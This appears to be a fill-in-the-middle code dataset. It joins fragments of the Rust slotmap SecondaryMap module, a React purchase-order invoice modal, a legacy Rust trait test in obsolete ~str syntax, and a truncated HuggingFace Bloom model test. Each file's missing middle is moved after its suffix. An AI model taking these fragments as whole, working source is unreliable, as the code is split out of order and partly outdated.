impl<K: Key, V: Eq> Eq for SecondaryMap<K, V> {}
impl<K: Key, V> FromIterator<(K, V)> for SecondaryMap<K, V> {
fn from_iter<I: IntoIterator<Item = (K, V)>>(iter: I) -> Self {
let mut sec = Self::new();
sec.extend(iter);
sec
}
}
impl<K: Key, V> Extend<(K, V)> for SecondaryMap<K, V> {
fn extend<I: IntoIterator<Item = (K, V)>>(&mut self, iter: I) {
let iter = iter.into_iter();
for (k, v) in iter {
self.insert(k, v);
}
}
}
impl<'a, K: Key, V: 'a + Copy> Extend<(K, &'a V)> for SecondaryMap<K, V> {
fn extend<I: IntoIterator<Item = (K, &'a V)>>(&mut self, iter: I) {
let iter = iter.into_iter();
for (k, v) in iter {
self.insert(k, *v);
}
}
}
/// A view into a occupied entry in a [`SecondaryMap`]. It is part of the
/// [`Entry`] enum.
#[derive(Debug)]
pub struct OccupiedEntry<'a, K: Key, V> {
map: &'a mut SecondaryMap<K, V>,
kd: KeyData,
_k: PhantomData<fn(K) -> K>,
}
/// A view into a vacant entry in a [`SecondaryMap`]. It is part of the
/// [`Entry`] enum.
#[derive(Debug)]
pub struct VacantEntry<'a, K: Key, V> {
map: &'a mut SecondaryMap<K, V>,
kd: KeyData,
_k: PhantomData<fn(K) -> K>,
}
/// A view into a single entry in a [`SecondaryMap`], which may either be
/// vacant or occupied.
///
/// This `enum` is constructed using [`SecondaryMap::entry`].
#[derive(Debug)]
pub enum Entry<'a, K: Key, V> {
/// An occupied entry.
Occupied(OccupiedEntry<'a, K, V>),
/// A vacant entry.
Vacant(VacantEntry<'a, K, V>),
}
impl<'a, K: Key, V> Entry<'a, K, V> {
/// Ensures a value is in the entry by inserting the default if empty, and
/// returns a mutable reference to the value in the entry.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert("poneyland");
/// let v = sec.entry(k).unwrap().or_insert(10);
/// assert_eq!(*v, 10);
/// *sec.entry(k).unwrap().or_insert(1) *= 2;
/// assert_eq!(sec[k], 20);
/// ```
pub fn or_insert(self, default: V) -> &'a mut V {
self.or_insert_with(|| default)
}
/// Ensures a value is in the entry by inserting the result of the default
/// function if empty, and returns a mutable reference to the value in the
/// entry.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// let v = sec.entry(k).unwrap().or_insert_with(|| "foobar".to_string());
/// assert_eq!(v, &"foobar");
/// ```
pub fn or_insert_with<F: FnOnce() -> V>(self, default: F) -> &'a mut V {
match self {
Entry::Occupied(x) => x.into_mut(),
Entry::Vacant(x) => x.insert(default()),
}
}
/// Returns this entry's key.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec: SecondaryMap<_, ()> = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// let entry = sec.entry(k).unwrap();
/// assert_eq!(entry.key(), k);
/// ```
pub fn key(&self) -> K {
match self {
Entry::Occupied(entry) => entry.kd.into(),
Entry::Vacant(entry) => entry.kd.into(),
}
}
/// Provides in-place mutable access to an occupied entry before any
/// potential inserts into the map.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 0);
/// sec.entry(k).unwrap().and_modify(|x| *x = 1);
///
/// assert_eq!(sec[k], 1)
/// ```
pub fn and_modify<F>(self, f: F) -> Self
where
F: FnOnce(&mut V),
{
match self {
Entry::Occupied(mut entry) => {
f(entry.get_mut());
Entry::Occupied(entry)
}
Entry::Vacant(entry) => Entry::Vacant(entry),
}
}
}
impl<'a, K: Key, V: Default> Entry<'a, K, V> {
/// Ensures a value is in the entry by inserting the default value if empty,
/// and returns a mutable reference to the value in the entry.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec: SecondaryMap<_, Option<i32>> = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.entry(k).unwrap().or_default();
/// assert_eq!(sec[k], None)
/// ```
pub fn or_default(self) -> &'a mut V {
self.or_insert_with(Default::default)
}
}
impl<'a, K: Key, V> OccupiedEntry<'a, K, V> {
/// Returns this entry's key.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
/// assert_eq!(sec.entry(k).unwrap().key(), k);
/// ```
pub fn key(&self) -> K {
self.kd.into()
}
/// Removes the entry from the slot map and returns the key and value.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let foo = sm.insert("foo");
/// sec.entry(foo).unwrap().or_insert("bar");
///
/// if let Some(Entry::Occupied(o)) = sec.entry(foo) {
/// assert_eq!(o.remove_entry(), (foo, "bar"));
/// }
/// assert_eq!(sec.contains_key(foo), false);
/// ```
pub fn remove_entry(self) -> (K, V) {
(self.kd.into(), self.remove())
}
/// Gets a reference to the value in the entry.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
///
/// if let Entry::Occupied(o) = sec.entry(k).unwrap() {
/// assert_eq!(*o.get(), 10);
/// }
/// ```
pub fn get(&self) -> &V {
unsafe { self.map.get_unchecked(self.kd.into()) }
}
/// Gets a mutable reference to the value in the entry.
///
/// If you need a reference to the [`OccupiedEntry`] which may outlive the
/// destruction of the [`Entry`] value, see [`into_mut`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
/// if let Entry::Occupied(mut o) = sec.entry(k).unwrap() {
/// *o.get_mut() = 20;
/// }
/// assert_eq!(sec[k], 20);
/// ```
///
/// [`into_mut`]: Self::into_mut
pub fn get_mut(&mut self) -> &mut V {
unsafe { self.map.get_unchecked_mut(self.kd.into()) }
}
/// Converts the [`OccupiedEntry`] into a mutable reference to the value in
/// the entry with a lifetime bound to the map itself.
///
/// If you need multiple references to the [`OccupiedEntry`], see
/// [`get_mut`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(0);
/// sec.insert(k, 0);
///
/// let r;
/// if let Entry::Occupied(o) = sec.entry(k).unwrap() {
/// r = o.into_mut(); // v outlives the entry.
/// } else {
/// r = sm.get_mut(k).unwrap();
/// }
/// *r = 1;
/// assert_eq!((sm[k], sec[k]), (0, 1));
/// ```
///
/// [`get_mut`]: Self::get_mut
pub fn into_mut(self) -> &'a mut V {
unsafe { self.map.get_unchecked_mut(self.kd.into()) }
}
/// Sets the value of the entry, and returns the entry's old value.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
///
/// if let Entry::Occupied(mut o) = sec.entry(k).unwrap() {
/// let v = o.insert(20);
/// assert_eq!(v, 10);
/// assert_eq!(*o.get(), 20);
/// }
/// ```
pub fn insert(&mut self, value: V) -> V {
replace(self.get_mut(), value)
}
/// Takes the value out of the entry, and returns it.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
///
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
///
/// if let Entry::Occupied(mut o) = sec.entry(k).unwrap() {
/// assert_eq!(o.remove(), 10);
/// assert_eq!(sec.contains_key(k), false);
/// }
/// ```
pub fn remove(self) -> V {
let slot = unsafe { self.map.slots.get_unchecked_mut(self.kd.idx as usize) };
self.map.num_elems -= 1;
match replace(slot, Slot::new_vacant()) {
Occupied { value, .. } => value,
Vacant => unsafe { unreachable_unchecked() },
}
}
}
impl<'a, K: Key, V> VacantEntry<'a, K, V> {
/// Gets the key that would be used when inserting a value through the
/// [`VacantEntry`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
///
/// let mut sm = SlotMap::new();
/// let mut sec: SecondaryMap<_, ()> = SecondaryMap::new();
///
/// let k = sm.insert(1);
///
/// if let Entry::Vacant(v) = sec.entry(k).unwrap() {
/// assert_eq!(v.key(), k);
/// }
/// ```
pub fn key(&self) -> K {
self.kd.into()
}
/// Sets the value of the entry with the [`VacantEntry`]'s key, and returns
/// a mutable reference to it.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
///
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
///
/// if let Entry::Vacant(v) = sec.entry(k).unwrap() {
/// let new_val = v.insert(3);
/// assert_eq!(new_val, &mut 3);
/// }
/// ```
pub fn insert(self, value: V) -> &'a mut V {
let slot = unsafe { self.map.slots.get_unchecked_mut(self.kd.idx as usize) };
// Despite the slot being considered Vacant for this entry, it might be occupied
// with an outdated element.
match replace(slot, Slot::new_occupied(self.kd.version.get(), value)) {
Occupied { .. } => {},
Vacant => self.map.num_elems += 1,
}
unsafe { slot.get_unchecked_mut() }
}
}
// Iterators.
/// A draining iterator for [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::drain`].
#[derive(Debug)]
pub struct Drain<'a, K: Key + 'a, V: 'a> {
num_left: usize,
sm: &'a mut SecondaryMap<K, V>,
cur: usize,
}
/// An iterator that moves key-value pairs out of a [`SecondaryMap`].
///
/// This iterator is created by calling the `into_iter` method on [`SecondaryMap`],
/// provided by the [`IntoIterator`] trait.
#[derive(Debug)]
pub struct IntoIter<K: Key, V> {
num_left: usize,
slots: Enumerate<alloc::vec::IntoIter<Slot<V>>>,
_k: PhantomData<fn(K) -> K>,
}
/// An iterator over the key-value pairs in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::iter`].
#[derive(Debug)]
pub struct Iter<'a, K: Key + 'a, V: 'a> {
num_left: usize,
slots: Enumerate<core::slice::Iter<'a, Slot<V>>>,
_k: PhantomData<fn(K) -> K>,
}
/// A mutable iterator over the key-value pairs in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::iter_mut`].
#[derive(Debug)]
pub struct IterMut<'a, K: Key + 'a, V: 'a> {
num_left: usize,
slots: Enumerate<core::slice::IterMut<'a, Slot<V>>>,
_k: PhantomData<fn(K) -> K>,
}
/// An iterator over the keys in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::keys`].
#[derive(Debug)]
pub struct Keys<'a, K: Key + 'a, V: 'a> {
inner: Iter<'a, K, V>,
}
/// An iterator over the values in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::values`].
#[derive(Debug)]
pub struct Values<'a, K: Key + 'a, V: 'a> {
inner: Iter<'a, K, V>,
}
/// A mutable iterator over the values in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::values_mut`].
#[derive(Debug)]
pub struct ValuesMut<'a, K: Key + 'a, V: 'a> {
inner: IterMut<'a, K, V>,
}
impl<'a, K: Key, V> Iterator for Drain<'a, K, V> {
type Item = (K, V);
fn next(&mut self) -> Option<(K, V)> {
let len = self.sm.slots.len();
while self.cur < len {
let idx = self.cur;
self.cur += 1;
let slot = unsafe { self.sm.slots.get_unchecked_mut(idx) };
if let Occupied { value, version } = replace(slot, Slot::new_vacant()) {
self.sm.num_elems -= 1;
self.num_left -= 1;
let key = KeyData::new(idx as u32, version.get()).into();
return Some((key, value));
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num_left, Some(self.num_left))
}
}
impl<'a, K: Key, V> Drop for Drain<'a, K, V> {
fn drop(&mut self) {
self.for_each(|_drop| {});
}
}
impl<K: Key, V> Iterator for IntoIter<K, V> {
type Item = (K, V);
fn next(&mut self) -> Option<(K, V)> {
while let Some((idx, mut slot)) = self.slots.next() {
if let Occupied { value, version } = replace(&mut slot, Slot::new_vacant()) {
self.num_left -= 1;
let key = KeyData::new(idx as u32, version.get()).into();
return Some((key, value));
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num_left, Some(self.num_left))
}
}
impl<'a, K: Key, V> Iterator for Iter<'a, K, V> {
type Item = (K, &'a V);
fn next(&mut self) -> Option<(K, &'a V)> {
while let Some((idx, slot)) = self.slots.next() {
if let Occupied { value, version } = slot {
self.num_left -= 1;
let key = KeyData::new(idx as u32, version.get()).into();
return Some((key, value));
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num_left, Some(self.num_left))
}
}
impl<'a, K: Key, V> Iterator for IterMut<'a, K, V> {
type Item = (K, &'a mut V);
fn next(&mut self) -> Option<(K, &'a mut V)> {
while let Some((idx, slot)) = self.slots.next() {
if let Occupied { value, version } = slot {
let key = KeyData::new(idx as u32, version.get()).into();
self.num_left -= 1;
return Some((key, value));
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num_left, Some(self.num_left))
}
}
impl<'a, K: Key, V> Iterator for Keys<'a, K, V> {
type Item = K;
fn next(&mut self) -> Option<K> {
self.inner.next().map(|(key, _)| key)
}
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
impl<'a, K: Key, V> Iterator for Values<'a, K, V> {
type Item = &'a V;
fn next(&mut self) -> Option<&'a V> {
self.inner.next().map(|(_, value)| value)
}
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
impl<'a, K: Key, V> Iterator for ValuesMut<'a, K, V> {
type Item = &'a mut V;
fn next(&mut self) -> Option<&'a mut V> {
self.inner.next().map(|(_, value)| value)
}
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
impl<'a, K: Key, V> IntoIterator for &'a SecondaryMap<K, V> {
type Item = (K, &'a V);
type IntoIter = Iter<'a, K, V>;
fn into_iter(self) -> Self::IntoIter {
self.iter()
}
}
impl<'a, K: Key, V> IntoIterator for &'a mut SecondaryMap<K, V> {
type Item = (K, &'a mut V);
type IntoIter = IterMut<'a, K, V>;
fn into_iter(self) -> Self::IntoIter {
self.iter_mut()
}
}
impl<K: Key, V> IntoIterator for SecondaryMap<K, V> {
type Item = (K, V);
type IntoIter = IntoIter<K, V>;
fn into_iter(self) -> Self::IntoIter {
let len = self.len();
let mut it = self.slots.into_iter().enumerate();
it.next(); // Skip sentinel.
IntoIter {
num_left: len,
slots: it,
_k: PhantomData,
}
}
}
impl<'a, K: Key, V> FusedIterator for Iter<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for IterMut<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for Keys<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for Values<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for ValuesMut<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for Drain<'a, K, V> {}
impl<K: Key, V> FusedIterator for IntoIter<K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for Iter<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for IterMut<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for Keys<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for Values<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for ValuesMut<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for Drain<'a, K, V> {}
impl<K: Key, V> ExactSizeIterator for IntoIter<K, V> {}
// Serialization with serde.
#[cfg(feature = "serde")]
mod serialize {
use super::*;
use serde::{de, Deserialize, Deserializer, Serialize, Serializer};
#[derive(Serialize, Deserialize)]
struct SerdeSlot<T> {
value: Option<T>,
version: u32,
}
impl<T: Serialize> Serialize for Slot<T> {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
let serde_slot = SerdeSlot {
version: self.version(),
value: match self {
Occupied { value, .. } => Some(value),
Vacant => None,
},
};
serde_slot.serialize(serializer)
}
}
impl<'de, T> Deserialize<'de> for Slot<T>
where
T: Deserialize<'de>,
{
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: Deserializer<'de>,
{
let serde_slot: SerdeSlot<T> = Deserialize::deserialize(deserializer)?;
let occupied = serde_slot.version % 2 == 1;
if occupied ^ serde_slot.value.is_some() {
return Err(de::Error::custom(&"inconsistent occupation in Slot"));
}
Ok(match serde_slot.value {
Some(value) => Self::new_occupied(serde_slot.version, value),
None => Self::new_vacant(),
})
}
}
impl<K: Key, V: Serialize> Serialize for SecondaryMap<K, V> {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
self.slots.serialize(serializer)
}
}
impl<'de, K: Key, V: Deserialize<'de>> Deserialize<'de> for SecondaryMap<K, V> {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: Deserializer<'de>,
{
let mut slots: Vec<Slot<V>> = Deserialize::deserialize(deserializer)?;
if slots.len() >= (u32::max_value() - 1) as usize {
return Err(de::Error::custom(&"too many slots"));
}
// Ensure the first slot exists and is empty for the sentinel.
if slots.get(0).map_or(true, |slot| slot.occupied()) {
return Err(de::Error::custom(&"first slot not empty"));
}
slots[0] = Slot::new_vacant();
let num_elems = slots.iter().map(|s| s.occupied() as usize).sum();
Ok(Self {
num_elems,
slots,
_k: PhantomData,
})
}
}
}
#[cfg(test)]
mod tests {
use crate::*;
use quickcheck::quickcheck;
use std::collections::HashMap;
#[cfg(all(nightly, feature = "unstable"))]
#[test]
fn disjoint() {
// Intended to be run with miri to find any potential UB.
let mut sm = SlotMap::new();
let mut sec = SecondaryMap::new();
// Some churn.
for i in 0..20usize {
sm.insert(i);
}
sm.retain(|_, i| *i % 2 == 0);
for (i, k) in sm.keys().enumerate() {
sec.insert(k, i);
}
let keys: Vec<_> = sm.keys().collect();
for i in 0..keys.len() {
for j in 0..keys.len() {
if let Some([r0, r1]) = sec.get_disjoint_mut([keys[i], keys[j]]) {
*r0 ^= *r1;
*r1 = r1.wrapping_add(*r0);
} else {
assert!(i == j);
}
}
}
for i in 0..keys.len() {
for j in 0..keys.len() {
for k in 0..keys.len() {
if let Some([r0, r1, r2]) = sec.get_disjoint_mut([keys[i], keys[j], keys[k]]) {
*r0 ^= *r1;
*r0 = r0.wrapping_add(*r2);
*r1 ^= *r0;
*r1 = r1.wrapping_add(*r2);
*r2 ^= *r0;
*r2 = r2.wrapping_add(*r1);
} else {
assert!(i == j || j == k || i == k);
}
}
}
}
}
quickcheck! {
fn qc_secmap_equiv_hashmap(operations: Vec<(u8, u32)>) -> bool {
let mut hm = HashMap::new();
let mut hm_keys = Vec::new();
let mut unique_key = 0u32;
let mut sm = SlotMap::new();
let mut sec = SecondaryMap::new();
let mut sm_keys = Vec::new();
#[cfg(not(feature = "serde"))]
let num_ops = 4;
#[cfg(feature = "serde")]
let num_ops = 5;
for (op, val) in operations {
match op % num_ops {
// Insert.
0 => {
hm.insert(unique_key, val);
hm_keys.push(unique_key);
unique_key += 1;
let k = sm.insert(val);
sec.insert(k, val);
sm_keys.push(k);
}
// Delete.
1 => {
if hm_keys.is_empty() { continue; }
let idx = val as usize % hm_keys.len();
sm.remove(sm_keys[idx]);
if hm.remove(&hm_keys[idx]) != sec.remove(sm_keys[idx]) {
return false;
}
}
// Access.
2 => {
if hm_keys.is_empty() { continue; }
let idx = val as usize % hm_keys.len();
let (hm_key, sm_key) = (&hm_keys[idx], sm_keys[idx]);
if hm.contains_key(hm_key) != sec.contains_key(sm_key) ||
hm.get(hm_key) != sec.get(sm_key) {
return false;
}
}
// Clone.
3 => {
sec = sec.clone();
}
// Serde round-trip.
#[cfg(feature = "serde")]
4 => {
let ser = serde_json::to_string(&sec).unwrap();
sec = serde_json::from_str(&ser).unwrap();
}
_ => unreachable!(),
}
}
let mut secv: Vec<_> = sec.values().collect();
let mut hmv: Vec<_> = hm.values().collect();
secv.sort();
hmv.sort();
secv == hmv
}
}
}
|
clear
|
POInvoiceModal.tsx
|
import { Modal, TextField, withStyles } from '@kudoo/components';
import React, { useState } from 'react';
import { connect } from 'react-redux';
import { compose } from 'recompose';
import { showToast } from 'src/helpers/toast';
import { IPOResponse } from 'src/screens/inventory/PurchaseOrder/PbsPurchaseOrderTab/CreatePbsPO/PBSPOtypes';
import {
APINVOICE,
POSTATUS,
} from 'src/screens/inventory/PurchaseOrder/PurchaseOrder/types';
import { IReduxState } from 'src/store/reducers';
import { IProfileState } from 'src/store/reducers/profile';
import styles, { StyleKeys } from './styles';
type IProps = IRouteProps<StyleKeys> & {
onClose: () => void;
visible: boolean;
purchaseOrder: {
id?: string;
};
profile?: IProfileState;
createApInvoice?: ({}) => Promise<IPOResponse>;
updateApInvoice?: ({}) => Promise<IPOResponse>;
updatePurchaseOrder?: ({}) => Promise<IPOResponse>;
};
const POInvoiceModal: React.FC<IProps> = (props) => {
const {
onClose,
visible,
purchaseOrder,
createApInvoice,
updatePurchaseOrder,
} = props;
const [invoiceNumber, setInvoiceNumber] = useState('');
const [submitting, setSubmitting] = useState(false);
const isSubmitDisabled = !invoiceNumber || submitting;
const generateApInvoice = async () => {
try {
setSubmitting(true);
const dataToSend = {
purchaseOrder: {
connect: {
id: purchaseOrder.id,
},
},
status: APINVOICE.OPEN,
invoiceNumber,
};
const apInvoiceRes = await createApInvoice({
data: dataToSend,
});
if (apInvoiceRes.success) {
const res = await updatePurchaseOrder({
data: {
status: POSTATUS.INVOICED,
},
where: { id: purchaseOrder.id },
});
|
showToast(null, 'Status Updated');
onClose();
} else {
res.error.forEach((err) => showToast(err));
onClose();
}
} else {
apInvoiceRes.error.forEach((err) => showToast(err));
onClose();
}
} catch (e) {
showToast(e.toString());
} finally {
setSubmitting(false);
}
};
return (
<Modal
visible={visible}
onClose={onClose}
showCloseButton
title='Send Purchase Order Email'
description={
<div>
<TextField
label={'Invoice Number'}
placeholder={'1234'}
name='invoiceNumber'
id='invoiceNumber'
value={String(invoiceNumber)}
onChange={(e) => {
setInvoiceNumber(e.target.value);
}}
/>
</div>
}
buttons={[
{
title: submitting ? 'Submitting...' : 'Submit',
onClick: generateApInvoice,
isDisabled: isSubmitDisabled,
loading: submitting,
},
]}
/>
);
};
POInvoiceModal.defaultProps = {
onClose: () => {},
purchaseOrder: {},
createApInvoice: () => ({} as any),
updateApInvoice: () => ({} as any),
updatePurchaseOrder: () => ({} as any),
};
export default compose<IProps, IProps>(
withStyles(styles),
// withUpdatePurchaseOrder(),
// withCreateApInvoice(),
// withUpdateApInvoice(),
connect((state: IReduxState) => ({
profile: state.profile,
})),
)(POInvoiceModal);
|
if (res.success) {
|
trait-to-str.rs
|
// Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
trait to_str {
fn to_string(&self) -> ~str;
}
impl to_str for int {
fn to_string(&self) -> ~str { self.to_str() }
}
impl<T:to_str> to_str for Vec<T> {
fn to_string(&self) -> ~str {
format!("[{}]", self.iter().map(|e| e.to_string()).collect::<Vec<~str>>().connect(", "))
}
}
pub fn main() {
assert!(1.to_string() == "1".to_owned());
assert!((vec!(2, 3, 4)).to_string() == "[2, 3, 4]".to_owned());
fn indirect<T:to_str>(x: T) -> ~str
|
assert!(indirect(vec!(10, 20)) == "[10, 20]!".to_owned());
fn indirect2<T:to_str>(x: T) -> ~str {
indirect(x)
}
assert!(indirect2(vec!(1)) == "[1]!".to_owned());
}
|
{
x.to_string() + "!"
}
|
test_modeling_bloom.py
|
# coding=utf-8
# Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import unittest
from transformers import BloomConfig, is_torch_available
from transformers.testing_utils import require_torch, require_torch_gpu, slow, torch_device
from ...generation.test_generation_utils import GenerationTesterMixin
from ...test_configuration_common import ConfigTester
from ...test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
BLOOM_PRETRAINED_MODEL_ARCHIVE_LIST,
BloomForCausalLM,
BloomForSequenceClassification,
BloomForTokenClassification,
BloomModel,
BloomTokenizerFast,
)
@require_torch
class BloomModelTester:
def __init__(
self,
parent,
batch_size=14,
seq_length=7,
is_training=True,
use_token_type_ids=False,
use_input_mask=True,
use_labels=True,
use_mc_token_ids=True,
vocab_size=99,
hidden_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=16,
type_sequence_label_size=2,
initializer_range=0.02,
num_labels=3,
num_choices=4,
scope=None,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_token_type_ids = use_token_type_ids
self.use_input_mask = use_input_mask
self.use_labels = use_labels
self.use_mc_token_ids = use_mc_token_ids
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.type_sequence_label_size = type_sequence_label_size
self.initializer_range = initializer_range
self.num_labels = num_labels
self.num_choices = num_choices
self.scope = None
self.bos_token_id = vocab_size - 1
self.eos_token_id = vocab_size - 1
self.pad_token_id = vocab_size - 1
def get_large_model_config(self):
return BloomConfig.from_pretrained("bigscience/bloom")
def prepare_config_and_inputs(self, gradient_checkpointing=False):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = random_attention_mask([self.batch_size, self.seq_length])
sequence_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
config = self.get_config(gradient_checkpointing=gradient_checkpointing)
return (config, input_ids, input_mask, sequence_labels)
def get_config(self, gradient_checkpointing=False, slow_but_exact=True):
return BloomConfig(
vocab_size=self.vocab_size,
seq_length=self.seq_length,
hidden_size=self.hidden_size,
n_layer=self.num_hidden_layers,
n_head=self.num_attention_heads,
resid_pdrop=self.hidden_dropout_prob,
attn_pdrop=self.attention_probs_dropout_prob,
n_positions=self.max_position_embeddings,
type_vocab_size=self.type_vocab_size,
initializer_range=self.initializer_range,
use_cache=True,
bos_token_id=self.bos_token_id,
eos_token_id=self.eos_token_id,
pad_token_id=self.pad_token_id,
num_labels=self.num_labels,
gradient_checkpointing=gradient_checkpointing,
slow_but_exact=slow_but_exact,
dtype="float32",
)
def create_and_check_bloom_model(self, config, input_ids, input_mask, *args):
model = BloomModel(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
self.parent.assertEqual(len(result.past_key_values), config.n_layer)
def create_and_check_bloom_model_past(self, config, input_ids, input_mask, *args):
model = BloomModel(config=config)
model.to(torch_device)
model.eval()
# first forward pass
outputs = model(input_ids, attention_mask=torch.ones_like(input_ids), use_cache=True)
outputs_use_cache_conf = model(input_ids, attention_mask=torch.ones_like(input_ids))
outputs_no_past = model(input_ids, use_cache=False, attention_mask=torch.ones_like(input_ids))
self.parent.assertTrue(len(outputs) == len(outputs_use_cache_conf))
self.parent.assertTrue(len(outputs) == len(outputs_no_past) + 1)
past = outputs["past_key_values"]
# create hypothetical next token and extent to next_input_ids
next_tokens = ids_tensor((self.batch_size, 1), config.vocab_size)
# append to next input_ids and token_type_ids
next_input_ids = torch.cat([input_ids, next_tokens], dim=-1)
output_from_no_past = model(next_input_ids)["last_hidden_state"]
output_from_past = model(next_tokens, past_key_values=past)["last_hidden_state"]
# select random slice
random_slice_idx = ids_tensor((1,), output_from_past.shape[-1]).item()
output_from_no_past_slice = output_from_no_past[:, -1, random_slice_idx].detach()
output_from_past_slice = output_from_past[:, 0, random_slice_idx].detach()
# test that outputs are equal for slice
self.parent.assertTrue(torch.allclose(output_from_past_slice, output_from_no_past_slice, atol=1e-3))
def create_and_check_bloom_model_attention_mask_past(self, config, input_ids, input_mask, *args):
model = BloomModel(config=config)
model.to(torch_device)
model.eval()
# create attention mask
attn_mask = torch.ones(input_ids.shape, dtype=torch.long, device=torch_device)
half_seq_length = self.seq_length // 2
attn_mask[:, half_seq_length:] = 0
# first forward pass
output, past = model(input_ids, attention_mask=attn_mask).to_tuple()
# create hypothetical next token and extent to next_input_ids
next_tokens = ids_tensor((self.batch_size, 1), config.vocab_size)
# change a random masked slice from input_ids
random_seq_idx_to_change = ids_tensor((1,), half_seq_length).item() + 1
